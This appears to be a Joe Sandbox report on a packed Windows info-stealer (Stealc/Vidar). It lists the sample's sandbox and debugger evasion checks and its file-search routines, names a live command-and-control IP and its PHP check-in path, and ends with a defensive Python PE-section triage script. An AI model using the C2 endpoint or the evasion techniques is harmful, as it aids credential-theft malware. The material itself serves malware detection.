                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800319 second address: 580036C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FBD38EF6175h 0x0000000f xor esi, 4AD1E496h 0x00000015 jmp 00007FBD38EF6171h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBD38EF6178h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 580036C second address: 5800394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3971C77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBD3971C785h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5800394 second address: 58003A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38EF616Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F119BD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F11ABC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10D7F31 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 113F6A3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00CBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00CC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00CBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CBDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB1160 GetSystemInfo,ExitProcess,0_2_00CB1160
                Source: file.exe, file.exe, 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1706114024.00000000018F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWO[dc
                Source: file.exe, 00000000.00000002.1706114024.00000000018C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1706114024.00000000018F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13567
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13552
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13555
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13572
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13607
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC9750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 2004, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2004, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1664387616.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2004, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK matrix (techniques the report mapped signatures to, with the count the report attaches to each; unnumbered template cells of the matrix are omitted):

Execution: Command and Scripting Interpreter (2), Native API (11)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
No mapped signatures: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact
Antivirus, machine learning and genetic malware detection

Initial sample (Source | Detection | Scanner | Label):
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
Dropped files, unpacked PE files, domains: no antivirus matches

URLs (Source | Detection | Scanner | Label):
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware

No contacted domains info

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs from process memory (Name | Source | Malicious | Antivirus Detection | Reputation); the trailing characters after some URLs are adjacent memory bytes picked up by the string extractor, not part of the URL:
http://185.215.113.37/e2b1563c6670f193.php4&ne | file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37eE | file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.373h | file.exe, 00000000.00000002.1706114024.00000000018D9000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1706114024.000000000187E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpd& | file.exe, 00000000.00000002.1706114024.00000000018C4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown

Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1531318
                        Start date and time:2024-10-11 01:49:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 1s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 86
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
IP context for 185.215.113.37 (Associated Sample Name | Detection | Threat Name | Context):
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                        No context
ASN context for WHOLESALECONNECTIONSNL (Associated Sample Name | Detection | Threat Name | Context):
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.947124524590918
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'825'280 bytes
                        MD5:9c7193e94b13d7380dccc18b19a95158
                        SHA1:4d69fe7afa38cf9fa65fd5acd25e66bc6ad230b4
                        SHA256:480374d99e5a098171a92a8b09b3a6fb5a43c216e21d328e6c17d87b5d12c2f0
                        SHA512:d977e3e34f8836febbba2075eab4ca09039544c30faba66c72feb97cbdece7ccbebd63e1b5e2163719039fe3cc7eb22c61252d45e1288e6fca9788eb18256162
                        SSDEEP:49152:o5vJL1QxKSx27FwopjOCKGZn8UDIyWEz5:eXvS+ljO1GFsyFz
                        TLSH:1C85330F9E577EA0D84E1537DCDBD34B5B38A84C82EB31A514483EE8A16F530B0B7969
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0xa8e000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007FBD38CF167Ah
                        popcnt ebx, dword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [ebx], al
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add bh, bh
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics); two sections have names the report renders as blank:
(blank) | 0x1000 | 0x25b000 | 0x22800 | 4d8b91750a0393e1e0bc60a35c8b5edd | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x25e000 | 0x297000 | 0x200 | a8c7f601a2e8d6e085283e033bd0a144 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qlydljbc | 0x4f5000 | 0x198000 | 0x197600 | e82216f90cd3bbd77f82d922dec57cb4 | False | 0.9947369304234428 | data | 7.95389639217539 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jrcyigtg | 0x68d000 | 0x1000 | 0x600 | f04de944a13451b19ca4a872c2318595 | False | 0.5911458333333334 | data | 5.048761108302702 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68e000 | 0x3000 | 0x2200 | 1fd64fe177bcfc63c8f210f4d2ed84d9 | False | 0.07559742647058823 | DOS executable (COM) | 0.9277131372678648 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports (DLL | Import):
kernel32.dll | lstrcpy
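The section table above carries the static evidence behind three of the report's signatures: two sections with blank names ("PE file contains section with special chars"), an entry point at 0xa8e000 that falls inside .taggant rather than a code section ("Entry point lies outside standard sections"), and five sections marked both writable and executable, one of which has a virtual size of 0x297000 against only 0x200 bytes on disk, the shape of a packer that unpacks into memory at run time. A single imported function, kernel32.dll!lstrcpy, points the same way. The following script is an added example, not code from the report or from Joe Sandbox: it parses a PE32 section table with only the standard library and flags those conditions. The image it runs on is a constructed fixture built from the values in the table (headers only, no code), and the list of "standard" section names is this example's own assumption, so extend it for the toolchains you actually see.

```python
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a linker normally places code in; an entry point anywhere else is
# reported. Assumption of this example, not a list from the report.
CODE_SECTION_NAMES = {".text", "CODE", ".code", "INIT"}
# Common linker-generated names; anything else is reported as unusual.
KNOWN_SECTION_NAMES = CODE_SECTION_NAMES | {
    ".rdata", ".data", ".bss", ".rsrc", ".reloc", ".idata", ".edata",
    ".pdata", ".tls", ".CRT", ".gfids", ".00cfg", ".didat", "DATA", "BSS",
}


def build_minimal_pe(entry_rva, image_base, sections):
    """Construct a PE32 skeleton (DOS header, NT headers, section table).
    Test fixture only: it contains no code and is not the sample itself."""
    e_lfanew = 0x40
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt = bytearray(224)                          # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)         # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_rva)    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)   # ImageBase
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, raw, chars in sections
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def parse_section_table(data):
    """Return (entry_rva, image_base, sections) read from a PE32 image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsections):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw_name = f[0].rstrip(b"\0")
        sections.append({
            "name": raw_name.decode("ascii", errors="replace"),
            "printable": bool(raw_name) and all(32 < b < 127 for b in raw_name),
            "vsize": f[1], "va": f[2], "raw": f[3], "chars": f[9],
        })
    return entry_rva, image_base, sections


def triage(data):
    """Flag blank or unusual names, RWX sections, sections far larger in
    memory than on disk, and an entry point outside a code section."""
    entry_rva, image_base, sections = parse_section_table(data)
    findings, entry_section = [], None
    for s in sections:
        label = s["name"] or "<blank>"
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"]):
            entry_section = s["name"]
        if not s["printable"] or s["name"] not in KNOWN_SECTION_NAMES:
            findings.append(("unusual-name", label))
        executable = bool(s["chars"] & IMAGE_SCN_MEM_EXECUTE)
        if executable and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(("writable-executable", label))
        if executable and s["vsize"] > 4 * max(s["raw"], 1):
            findings.append(("inflated-virtual-size", label))
    if entry_section not in CODE_SECTION_NAMES:
        findings.append(("entry-outside-code", entry_section))
    return {"entry_va": image_base + entry_rva,
            "entry_section": entry_section, "findings": findings}


# Section table as reported for file.exe: (name, VA, VirtualSize, RawSize, Characteristics).
RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
SAMPLE_SECTIONS = [
    (b"",         0x001000, 0x25B000, 0x022800, RWX),
    (b".rsrc",    0x25C000, 0x001000, 0x000000, RW),
    (b".idata",   0x25D000, 0x001000, 0x000200, RW),
    (b"",         0x25E000, 0x297000, 0x000200, RWX),
    (b"qlydljbc", 0x4F5000, 0x198000, 0x197600, RWX),
    (b"jrcyigtg", 0x68D000, 0x001000, 0x000600, RWX),
    (b".taggant", 0x68E000, 0x003000, 0x002200, RWX),
]
# Entry point 0xa8e000 with image base 0x400000 gives RVA 0x68e000.
SAMPLE_PE = build_minimal_pe(entry_rva=0x68E000, image_base=0x400000, sections=SAMPLE_SECTIONS)

if __name__ == "__main__":
    report = triage(SAMPLE_PE)
    print(f"entry point 0x{report['entry_va']:x} in section {report['entry_section']!r}")
    for kind, name in report["findings"]:
        print(f"  {kind}: {name}")
```

Run against a real file, `triage(open(path, "rb").read())` gives the same findings from the on-disk headers; the 4x ratio between virtual and raw size is a threshold chosen for this example, and a legitimate `.bss`-style section can trip it, which is why the check is limited to executable sections.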
Suricata IDS alert (Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol):
2024-10-11T01:49:59.923701+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

TCP packets (Timestamp | Source Port | Dest Port | Source IP | Dest IP):
Oct 11, 2024 01:49:58.957098961 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 11, 2024 01:49:58.962292910 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 11, 2024 01:49:58.962380886 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 11, 2024 01:49:58.962579966 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 11, 2024 01:49:58.967437983 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 11, 2024 01:49:59.687046051 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 11, 2024 01:49:59.687289953 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 11, 2024 01:49:59.689609051 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 11, 2024 01:49:59.694489002 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
